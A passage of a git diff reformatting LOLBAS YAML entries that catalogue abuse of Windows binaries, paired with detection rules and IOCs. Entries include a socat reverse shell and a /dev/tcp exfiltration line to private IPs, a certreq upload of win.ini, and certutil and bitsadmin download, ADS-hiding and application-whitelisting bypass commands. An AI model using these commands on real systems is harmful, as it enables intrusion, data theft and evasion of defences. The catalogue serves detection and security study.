https://github.com/SigmaHQ/sigma/blob/bdb00f403fd8ede0daa04449ad913200af9466ff/rules/windows/dns_query/win_dq_lobas_appinstaller.yml Resources: - - Link: https://twitter.com/notwhickey/status/1333900137232523264 +- Link: https://twitter.com/notwhickey/status/1333900137232523264 Acknowledgement: - - Person: Wade Hickey - Handle: '@notwhickey' ---- +- Person: Wade Hickey + Handle: '@notwhickey' diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index dc4cf74f7..c708cc0eb 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -1,28 +1,30 @@ ---- -Name: Aspnet_Compiler.exe -Description: ASP.NET Compilation Tool -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u - Description: Execute C# code with the Build Provider and proper folder structure in place. - Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 -Full_Path: - - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -Code_Sample: - - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml -Resources: - - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 -Acknowledgement: - - Person: cpl - Handle: '@cpl3h' ---- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: +- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v + none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none + -u + Description: Execute C# code with the Build Provider and proper folder structure + in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application + control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 +Full_Path: +- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe +- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: +- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: +- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml +Resources: +- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ +- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: +- Person: cpl + Handle: '@cpl3h' diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index c0b81bd52..9437aa6ea 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -1,37 +1,40 @@ ---- Name: At.exe Description: Schedule periodic tasks -Author: 'Freddie Barr-Smith' +Author: Freddie Barr-Smith Created: 2019-09-20 Commands: - - Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe - Description: Create a recurring task to execute every day at a specific time. - Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive - Category: Execute - Privileges: Local Admin - MitreID: T1053.002 - OperatingSystem: Windows 7 or older +- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su + C:\Windows\System32\revshell.exe + Description: Create a recurring task to execute every day at a specific time. + Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive + Category: Execute + Privileges: Local Admin + MitreID: T1053.002 + OperatingSystem: Windows 7 or older Full_Path: - - Path: C:\WINDOWS\System32\At.exe - - Path: C:\WINDOWS\SysWOW64\At.exe +- Path: C:\WINDOWS\System32\At.exe +- Path: C:\WINDOWS\SysWOW64\At.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_interactive_at.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_atsvc_task.yml - - IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job) - - IOC: C:\Windows\Tasks\At1.job - - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. +- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_interactive_at.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_atsvc_task.yml +- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job) +- IOC: C:\Windows\Tasks\At1.job +- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. +- Splunk: https://research.splunk.com/endpoint/7bc20606-5f40-11ec-a586-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/4be54858-432f-11ec-8209-3e22fbd008af/ +- Splunk: https://research.splunk.com/endpoint/bf0a378e-5f3c-11ec-a6de-acde48001122/ Resources: - - Link: https://freddiebarrsmith.com/at.txt - - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator - - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems +- Link: https://freddiebarrsmith.com/at.txt +- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html + - Escalate to System from Administrator +- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems Acknowledgement: - - Person: 'Freddie Barr-Smith' - Handle: - - Person: 'Riccardo Spolaor' - Handle: - - Person: 'Mariano Graziano' - Handle: - - Person: 'Xabier Ugarte-Pedrero' - Handle: ---- +- Person: Freddie Barr-Smith + Handle: null +- Person: Riccardo Spolaor + Handle: null +- Person: Mariano Graziano + Handle: null +- Person: Xabier Ugarte-Pedrero + Handle: null diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 45ffc5f99..2e5b49778 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -1,30 +1,30 @@ ---- Name: Atbroker.exe Description: Helper binary for Assistive Technology (AT) -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: ATBroker.exe /start malware - Description: Start a registered Assistive Technology (AT). - Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 8, Windows 8.1, Windows 10 +- Command: ATBroker.exe /start malware + Description: Start a registered Assistive Technology (AT). + Usecase: Executes code defined in registry for a new AT. Modifications must be made + to the system registry to either register or modify an existing Assistibe Technology + (AT) service entry. + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\Atbroker.exe - - Path: C:\Windows\SysWOW64\Atbroker.exe +- Path: C:\Windows\System32\Atbroker.exe +- Path: C:\Windows\SysWOW64\Atbroker.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml - - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration - - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs - - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware +- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml +- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration +- IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs +- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware Resources: - - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ +- Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ Acknowledgement: - - Person: Adam - Handle: '@hexacorn' ---- +- Person: Adam + Handle: '@hexacorn' diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 338a5d86b..f0f257668 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -1,51 +1,50 @@ ---- Name: Bash.exe Description: File used by Windows subsystem for Linux -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: bash.exe -c calc.exe - Description: Executes calc.exe from bash.exe - Usecase: Performs execution of specified file, can be used as a defensive evasion. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10 - - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" - Description: Executes a reverseshell - Usecase: Performs execution of specified file, can be used as a defensive evasion. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10 - - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' - Description: Exfiltrate data - Usecase: Performs execution of specified file, can be used as a defensive evasion. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10 - - Command: bash.exe -c calc.exe - Description: Executes calc.exe from bash.exe - Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. - Category: AWL Bypass - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10 +- Command: bash.exe -c calc.exe + Description: Executes calc.exe from bash.exe + Usecase: Performs execution of specified file, can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10 +- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" + Description: Executes a reverseshell + Usecase: Performs execution of specified file, can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10 +- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' + Description: Exfiltrate data + Usecase: Performs execution of specified file, can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10 +- Command: bash.exe -c calc.exe + Description: Executes calc.exe from bash.exe + Usecase: Performs execution of specified file, can be used to bypass Application + Whitelisting. + Category: AWL Bypass + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10 Full_Path: - - Path: C:\Windows\System32\bash.exe - - Path: C:\Windows\SysWOW64\bash.exe +- Path: C:\Windows\System32\bash.exe +- Path: C:\Windows\SysWOW64\bash.exe Code_Sample: - - Code: +- Code: null Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_bash.yml - - IOC: Child process from bash.exe +- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_bash.yml +- IOC: Child process from bash.exe Resources: - - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Acknowledgement: - - Person: Alex Ionescu - Handle: '@aionescu' - - Person: Asif Matadar - Handle: '@d1r4c' ---- +- Person: Alex Ionescu + Handle: '@aionescu' +- Person: Asif Matadar + Handle: '@d1r4c' diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 9a6f56bb8..6ae476264 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -1,59 +1,72 @@ ---- Name: Bitsadmin.exe Description: Used for managing background intelligent transfer -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 - Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. - Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique. - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 - Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset - Description: Command for copying cmd.exe to another folder - Usecase: Copy file - Category: Copy - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset - Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. - Usecase: Execute binary file specified. Can be used as a defensive evasion. - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe + bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin + /RESUME 1 bitsadmin /complete 1 + Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the + job to run the target command from an Alternate data stream, then resume and complete + the job. + Usecase: Performs execution of specified file in the alternate data stream, can + be used as a defensive evasion or persistence technique. + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe + c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 + Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the + job to run the target command, then resume and complete the job. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe + c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin + /reset + Description: Command for copying cmd.exe to another folder + Usecase: Copy file + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe + c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe + NULL & bitsadmin /RESUME 1 & bitsadmin /Reset + Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the + job, configure the job to run the target command, then resume and complete the + job. + Usecase: Execute binary file specified. Can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\bitsadmin.exe - - Path: C:\Windows\SysWOW64\bitsadmin.exe +- Path: C:\Windows\System32\bitsadmin.exe +- Path: C:\Windows\SysWOW64\bitsadmin.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/90ca1a8ad2e5c96d09a9ae4ff92483a2110d49ff/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/abcaf00aeef3769aa2a6f66f7fb6537b867c1691/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/e40b8592544721c689f8ae96477ea1218e4c7a05/rules/windows/process_creation/win_monitoring_for_persistence_via_bits.yml - - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml - - IOC: Child process from bitsadmin.exe - - IOC: bitsadmin creates new files - - IOC: bitsadmin adds data to alternate data stream +- Sigma: https://github.com/SigmaHQ/sigma/blob/90ca1a8ad2e5c96d09a9ae4ff92483a2110d49ff/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/abcaf00aeef3769aa2a6f66f7fb6537b867c1691/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/e40b8592544721c689f8ae96477ea1218e4c7a05/rules/windows/process_creation/win_monitoring_for_persistence_via_bits.yml +- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml +- IOC: Child process from bitsadmin.exe +- IOC: bitsadmin creates new files +- IOC: bitsadmin adds data to alternate data stream +- Splunk: https://research.splunk.com/endpoint/80630ff4-8e4c-11eb-aab5-acde48001122/ Resources: - - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 - - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 + - slide 53 +- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - - Person: Rob Fuller - Handle: '@mubix' - - Person: Chris Gates - Handle: '@carnal0wnage' - - Person: Oddvar Moe - Handle: '@oddvarmoe' ---- +- Person: Rob Fuller + Handle: '@mubix' +- Person: Chris Gates + Handle: '@carnal0wnage' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index eb2328d57..a4293b553 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -1,37 +1,35 @@ ---- Name: CertOC.exe Description: Used for installing certificates -Author: 'Ensar Samil' +Author: Ensar Samil Created: 2021-10-07 Commands: - - Command: certoc.exe -LoadDLL "C:\test\calc.dll" - Description: Loads the target DLL file - Usecase: Execute code within DLL file - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows Server 2022 - - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 - Description: Downloads text formatted files - Usecase: Download scripts, webshells etc. - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows Server 2022 +- Command: certoc.exe -LoadDLL "C:\test\calc.dll" + Description: Loads the target DLL file + Usecase: Execute code within DLL file + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows Server 2022 +- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 + Description: Downloads text formatted files + Usecase: Download scripts, webshells etc. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows Server 2022 Full_Path: - - Path: c:\windows\system32\certoc.exe - - Path: c:\windows\syswow64\certoc.exe +- Path: c:\windows\system32\certoc.exe +- Path: c:\windows\syswow64\certoc.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/406f10b583469f7f7c245ff41002f75902693b7d/rules/windows/process_creation/process_creation_certoc_execution.yml - - IOC: Process creation with given parameter - - IOC: Unsigned DLL load via certoc.exe - - IOC: Network connection via certoc.exe +- Sigma: https://github.com/SigmaHQ/sigma/blob/406f10b583469f7f7c245ff41002f75902693b7d/rules/windows/process_creation/process_creation_certoc_execution.yml +- IOC: Process creation with given parameter +- IOC: Unsigned DLL load via certoc.exe +- IOC: Network connection via certoc.exe Resources: - - Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - - Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20 +- Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 +- Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20 Acknowledgement: - - Person: Ensar Samil - Handle: '@sblmsrsn' ---- +- Person: Ensar Samil + Handle: '@sblmsrsn' diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index 2d60a3790..e17008779 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -1,35 +1,36 @@ ---- Name: CertReq.exe Description: Used for requesting and managing certificates -Author: 'David Middlehurst' +Author: David Middlehurst Created: 2020-07-07 Commands: - - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt - Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal - Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST - Usecase: Upload - Category: Upload - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt + Description: Save the response from a HTTP POST to the endpoint https://example.org/ + as output.txt in the current directory + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show + response in terminal + Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ + via HTTP POST + Usecase: Upload + Category: Upload + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\certreq.exe - - Path: C:\Windows\SysWOW64\certreq.exe +- Path: C:\Windows\System32\certreq.exe +- Path: C:\Windows\SysWOW64\certreq.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/eb8c9c046b86e7d412bdcc3235693fa1c00f70d6/rules/windows/process_creation/win_susp_certreq_download.yml - - IOC: certreq creates new files - - IOC: certreq makes POST requests +- Sigma: https://github.com/SigmaHQ/sigma/blob/eb8c9c046b86e7d412bdcc3235693fa1c00f70d6/rules/windows/process_creation/win_susp_certreq_download.yml +- IOC: certreq creates new files +- IOC: certreq makes POST requests Resources: - - Link: https://dtm.uk/certreq +- Link: https://dtm.uk/certreq Acknowledgement: - - Person: David Middlehurst - Handle: '@dtmsecurity' ---- +- Person: David Middlehurst + Handle: '@dtmsecurity' diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index f31d2f74b..9c6e6a4cf 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -1,78 +1,80 @@ ---- Name: Certutil.exe Description: Windows binary used for handling certificates -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Description: Download and save 7zip to disk in the current folder. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Description: Download and save 7zip to disk in the current folder. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt - Description: Download and save a PS1 file to an Alternate Data Stream (ADS). - Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil -encode inputFileName encodedOutputFileName - Description: Command to encode a file using Base64 - Usecase: Encode files to evade defensive measures - Category: Encode - Privileges: User - MitreID: T1027 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil -decode encodedInputFileName decodedOutputFileName - Description: Command to decode a Base64 encoded file. - Usecase: Decode files to evade defensive measures - Category: Decode - Privileges: User - MitreID: T1140 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil --decodehex encoded_hexadecimal_InputFileName - Description: Command to decode a hexadecimal-encoded file decodedOutputFileName - Usecase: Decode files to evade defensive measures - Category: Decode - Privileges: User - MitreID: T1140 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe + Description: Download and save 7zip to disk in the current folder. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe + Description: Download and save 7zip to disk in the current folder. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 + c:\temp:ttt + Description: Download and save a PS1 file to an Alternate Data Stream (ADS). + Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: certutil -encode inputFileName encodedOutputFileName + Description: Command to encode a file using Base64 + Usecase: Encode files to evade defensive measures + Category: Encode + Privileges: User + MitreID: T1027 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: certutil -decode encodedInputFileName decodedOutputFileName + Description: Command to decode a Base64 encoded file. + Usecase: Decode files to evade defensive measures + Category: Decode + Privileges: User + MitreID: T1140 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: certutil --decodehex encoded_hexadecimal_InputFileName + Description: Command to decode a hexadecimal-encoded file decodedOutputFileName + Usecase: Decode files to evade defensive measures + Category: Decode + Privileges: User + MitreID: T1140 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\certutil.exe - - Path: C:\Windows\SysWOW64\certutil.exe +- Path: C:\Windows\System32\certutil.exe +- Path: C:\Windows\SysWOW64\certutil.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/0fcbce993288f993e626494a50dad15fc26c8a0c/rules/windows/process_creation/win_susp_certutil_command.yml - - Sigma: 